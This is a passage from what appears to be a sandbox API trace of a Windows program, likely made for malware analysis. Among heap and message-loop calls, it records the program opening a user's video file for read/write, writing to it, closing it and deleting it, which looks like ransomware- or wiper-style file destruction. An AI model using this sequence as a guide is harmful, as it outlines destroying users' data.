wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.457] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.457] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.458] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.459] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.459] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.460] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.460] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\sq9web5cn_9jducj7p.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0192.462] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.463] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.463] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.463] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.463] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.464] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.465] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.465] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.465] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.465] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.465] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0192.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.465] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.466] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.466] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.466] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.466] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", lpFilePart=0x0) returned 0x43 [0192.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x17ebb4a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 0x90af58 [0192.467] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\sq9web5cn_9jducj7p.mp4")) returned 1 [0192.468] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7559120, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x94e2e2b0, ftLastAccessTime.dwHighDateTime=0x1d5db88, ftLastWriteTime.dwLowDateTime=0x17ebb4a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="sQ9weB5Cn_9JdUcj7P.mp4", cAlternateFileName="SQ9WEB~1.MP4")) returned 0 [0192.469] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.469] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.470] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.470] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.470] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.470] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.470] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0192.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.471] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.471] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, 